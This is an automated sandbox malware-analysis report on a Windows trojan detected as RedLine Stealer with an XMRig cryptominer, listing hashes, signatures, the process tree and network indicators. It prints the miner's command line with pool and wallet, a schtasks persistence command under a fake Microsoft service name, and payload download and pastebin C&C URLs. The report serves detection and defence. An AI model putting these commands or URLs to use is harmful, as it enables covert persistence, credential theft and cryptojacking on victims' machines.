
Analysis Report SecuriteInfo.com.Trojan.GenericKD.45754886.17334.7781

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.7781 (renamed file extension from 7781 to exe)
Analysis ID: 356837
MD5: bc584a3be92cfdfda79446372fffa46d
SHA1: 6f7d11b7c795bd1f48a078f05d8a4c5600448a03
SHA256: 8086d2b05316a9b44f55971a6c90da8ecb069d075973654f5f914229dc3070f6

Detection

RedLine Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Xmrig
Yara detected RedLine Stealer
Yara detected Xmrig cryptocurrency miner
Binary contains a suspicious time stamp
Connects to a pastebin service (likely for C&C)
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Hides threads from debuggers
Machine Learning detection for dropped file
May check the online IP address of the machine
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w10x64
  • SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe (PID: 2100 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe' MD5: BC584A3BE92CFDFDA79446372FFFA46D)
    • pg2bsuqa.exe (PID: 6124 cmdline: 'C:\Users\user\AppData\Local\pg2bsuqa.exe' MD5: 70DCA411445D3B4394D9C467BF3FF994)
    • zmql3v0y.exe (PID: 4012 cmdline: 'C:\Users\user\AppData\Local\zmql3v0y.exe' MD5: F0ECEFED65B00699CC2B57BF81492F56)
      • schtasks.exe (PID: 6484 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 6492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cpu.exe (PID: 6624 cmdline: 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1 MD5: E95F766A3748042EFBF0F05D823F82B7)
        • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • RantimeBroker.exe (PID: 6552 cmdline: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe MD5: F0ECEFED65B00699CC2B57BF81492F56)
  • RantimeBroker.exe (PID: 1632 cmdline: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe MD5: F0ECEFED65B00699CC2B57BF81492F56)
  • cleanup

Malware Configuration

Threatname: Xmrig

{"WALLET": "42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j", "POOL": "pool.minexmr"}

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\Windows\CPU\config.json | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security

Memory Dumps

Source | Rule | Description | Author | Strings
00000010.00000002.547615511.0000020FCC320000.00000004.00000020.sdmp | CoinMiner_Strings | Detects mining pool protocol string in Executable | Florian Roth
  • 0x35a9:$s1: stratum+tcp://
00000010.00000002.547615511.0000020FCC320000.00000004.00000020.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000010.00000002.547631429.0000020FCC328000.00000004.00000020.sdmp | CoinMiner_Strings | Detects mining pool protocol string in Executable | Florian Roth
  • 0x5250:$s1: stratum+tcp://
  • 0x52e0:$s1: stratum+tcp://
  • 0x847f:$s1: stratum+tcp://
  • 0xa523:$s1: stratum+tcp://
00000010.00000002.547631429.0000020FCC328000.00000004.00000020.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000004.00000003.274701180.00000000008A0000.00000004.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
6.2.zmql3v0y.exe.b30000.0.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
15.2.RantimeBroker.exe.d80000.0.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security

Sigma Overview

System Summary:

Sigma detected: Xmrig
Source: Process started | Author: Joe Security | Data: Command: 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1, CommandLine: 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe, NewProcessName: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\zmql3v0y.exe' , ParentImage: C:\Users\user\AppData\Local\zmql3v0y.exe, ParentProcessId: 4012, ProcessCommandLine: 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1, ProcessId: 6624

Signature Overview



AV Detection:

Antivirus detection for URL or domain
Source: https://blog.agencia10x.com/dance.exe | Avira URL Cloud: Label: malware
Source: https://blog.agencia10x.com/mex.exe | Avira URL Cloud: Label: malware
Found malware configuration
Source: cpu.exe.6624.16.memstr | Malware Configuration Extractor: Xmrig {"WALLET": "42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j", "POOL": "pool.minexmr"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe | Metadefender: Detection: 21%
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe | ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\zmql3v0y.exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe | Metadefender: Detection: 16%
Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe | ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe | ReversingLabs: Detection: 60%
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Metadefender: Detection: 21%
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | ReversingLabs: Detection: 28%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe | Joe Sandbox ML: detected

Bitcoin Miner:

Yara detected Xmrig cryptocurrency miner
Source: Yara match | File source: 00000010.00000002.547615511.0000020FCC320000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.547631429.0000020FCC328000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.319692642.0000000000D82000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.328721362.0000000003CD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.520808342.0000000000B32000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.324849643.0000020FCC35B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.547665443.0000020FCC34B000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.282484459.0000000001AC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000003.317443395.00000000015F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.318537012.0000000003391000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: cpu.exe PID: 6624, type: MEMORY
Source: Yara match | File source: Process Memory Space: zmql3v0y.exe PID: 4012, type: MEMORY
Source: Yara match | File source: Process Memory Space: RantimeBroker.exe PID: 6552, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Windows\CPU\config.json, type: DROPPED
Source: Yara match | File source: 6.2.zmql3v0y.exe.b30000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RantimeBroker.exe.d80000.0.unpack, type: UNPACKEDPE
Detected Stratum mining protocol
Source: global traffic | TCP traffic: 192.168.2.5:49731 -> 88.99.193.240:4444 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"42zyh6myztcdlqfmcpscggn8ppdku4pk16kh8uffytesddfwt5ihd2qfsws2bgnuwxwfnrtbjbr5w7dqgebrzdjcuzia53j./","pass":"x","agent":"xmrig/6.8.0 (windows nt 10.0; win64; x64) libuv/1.40.0 msvc/2019","algo":["cn/r","cn/2","cn/1","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","rx/0","rx/wow","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/wrkz","astrobwt"]}}.
Found strings related to Crypto-Mining
Source: zmql3v0y.exe | String found in binary or memory: -o stratum+tcp://
Source: zmql3v0y.exe | String found in binary or memory: pool.minexmr.com:4444

Compliance:

Uses 32bit PE files
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Uses secure TLS version for HTTPS connections
Source: unknown | HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.23.99.190:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.213.210:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49730 version: TLS 1.2
Binary contains paths to debug symbols
Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb | source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.278594567.00000000002F0000.00000040.00020000.sdmp, zmql3v0y.exe, 00000006.00000002.520873342.0000000000B40000.00000040.00020000.sdmp, RantimeBroker.exe, 0000000F.00000002.319896827.0000000000D90000.00000040.00020000.sdmp
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb | source: WinRing0x64.sys.6.dr

Networking:

Connects to a pastebin service (likely for C&C)
Source: unknown | DNS query: name: pastebin.com
May check the online IP address of the machine
Source: unknown | DNS query: name: iplogger.org
Source: global traffic | TCP traffic: 192.168.2.5:49731 -> 88.99.193.240:4444
Source: global traffic | HTTP traffic detected: GET /cpu.zip HTTP/1.1; Host: 195.2.84.91; Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 104.23.99.190 104.23.99.190
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx; Date: Tue, 23 Feb 2021 16:37:53 GMT; Content-Type: application/zip; Content-Length: 6296834; Connection: keep-alive; Keep-Alive: timeout=60; Last-Modified: Sat, 20 Feb 2021 21:11:22 GMT; ETag: "601502-5bbcb02b93280"; Accept-Ranges: bytes
Source: unknown | DNS traffic detected: queries for: iplogger.org
Source: zmql3v0y.exe, zmql3v0y.exe, 00000006.00000002.520808342.0000000000B32000.00000020.00020000.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000F.00000002.319692642.0000000000D82000.00000020.00020000.sdmp | String found in binary or memory: http://195.2.84.91/amd.zip
Source: zmql3v0y.exe, zmql3v0y.exe, 00000006.00000002.520808342.0000000000B32000.00000020.00020000.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000F.00000002.319692642.0000000000D82000.00000020.00020000.sdmp | String found in binary or memory: http://195.2.84.91/cpu.zip
Source: zmql3v0y.exe, zmql3v0y.exe, 00000006.00000002.520808342.0000000000B32000.00000020.00020000.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000F.00000002.319692642.0000000000D82000.00000020.00020000.sdmp | String found in binary or memory: http://195.2.84.91/nvidia.zip
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: WinRing0x64.sys.6.dr | String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: WinRing0x64.sys.6.dr | String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: WinRing0x64.sys.6.dr | String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: WinRing0x64.sys.6.dr | String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: pg2bsuqa.exe.0.dr | String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.280945530.0000000001122000.00000004.00000020.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: pg2bsuqa.exe.0.dr | String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.com
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.280945530.0000000001122000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://ocsp.digicert.com0H
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://ocsp.digicert.com0I
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://ocsp.digicert.com0P
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmp, pg2bsuqa.exe.0.dr | String found in binary or memory: http://ocsp.sectigo.com0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://ocsp.thawte.com0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://s.symcd.com06
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283892138.0000000003346000.00000004.00000001.sdmp | String found in binary or memory: https://blog.agencia10x.com/dance.exe
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283892138.0000000003346000.00000004.00000001.sdmp | String found in binary or memory: https://blog.agencia10x.com/dance.exed
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp | String found in binary or memory: https://blog.agencia10x.com/mex.exe
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp | String found in binary or memory: https://blog.agencia10x.com4
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283892138.0000000003346000.00000004.00000001.sdmp | String found in binary or memory: https://blog.agencia10x.comD8
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: https://d.symcb.com/cps0%
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: https://d.symcb.com/rpa0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: https://d.symcb.com/rpa0.
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmp | String found in binary or memory: https://iplogger.org
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.278531237.00000000002E2000.00000020.00020000.sdmp, SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmp | String found in binary or memory: https://iplogger.org/1r2et7
Source: zmql3v0y.exe, zmql3v0y.exe, 00000006.00000002.520808342.0000000000B32000.00000020.00020000.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000F.00000002.319692642.0000000000D82000.00000020.00020000.sdmp | String found in binary or memory: https://iplogger.org/1tsef7
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmp | String found in binary or memory: https://pastebin.com/raw/WmBNYXYN
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmp | String found in binary or memory: https://pastebin.com/raw/bnxCb5RP
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.278531237.00000000002E2000.00000020.00020000.sdmp | String found in binary or memory: https://pastebin.com/raw/bnxCb5RPChttps://pastebin.com/raw/WmBNYXYN
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283839555.00000000032C8000.00000004.00000001.sdmp | String found in binary or memory: https://pastebin.com4
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp | String found in binary or memory: https://pastebin.comD8
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283801731.00000000032C0000.00000004.00000001.sdmp | String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: pg2bsuqa.exe.0.drString found in binary or memory: https://sectigo.com/CPS0D
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: https://www.digicert.com/CPS0
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.23.99.190:443 -> 192.168.2.5:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.213.210:443 -> 192.168.2.5:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49730 version: TLS 1.2

System Summary:

PE file contains section with special chars
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static PE information: section name: (special characters, not rendered)
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static PE information: section name: (special characters, not rendered)
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static PE information: section name: (special characters, not rendered)
Source: pg2bsuqa.exe.0.dr | Static PE information: section name: (special characters, not rendered)
Source: pg2bsuqa.exe.0.dr | Static PE information: section name: (special characters, not rendered)
Source: pg2bsuqa.exe.0.dr | Static PE information: section name: (special characters, not rendered)
Source: zmql3v0y.exe.0.dr | Static PE information: section name: (special characters, not rendered)
Source: zmql3v0y.exe.0.dr | Static PE information: section name: (special characters, not rendered)
Source: zmql3v0y.exe.0.dr | Static PE information: section name: (special characters, not rendered)
Source: RantimeBroker.exe.6.dr | Static PE information: section name: (special characters, not rendered)
Source: RantimeBroker.exe.6.dr | Static PE information: section name: (special characters, not rendered)
Source: RantimeBroker.exe.6.dr | Static PE information: section name: (special characters, not rendered)
Source: C:\Users\user\AppData\Local\zmql3v0y.exe | File created: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe | Code function: 4_2_003D1D30
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe | Code function: 4_2_003D4928
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\pg2bsuqa.exe 1D1F06C0D0965296755770B3F6A70A90E0D21A57EF5E47F9A26FCC4008AD45EF
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\zmql3v0y.exe 83F953427624EABA72E6D34339B4004C3614657BFE9FB601ECA7E76410B71325
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static PE information: invalid certificate
Source: pg2bsuqa.exe.0.dr | Static PE information: Number of sections : 11 > 10
Source: cpu.exe.6.dr | Static PE information: Number of sections : 13 > 10
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: pg2bsuqa.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cpu.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cpu.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cpu.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cpu.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cpu.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cpu.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cpu.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cpu.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Binary or memory string: OriginalFilename vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.284152284.0000000005420000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
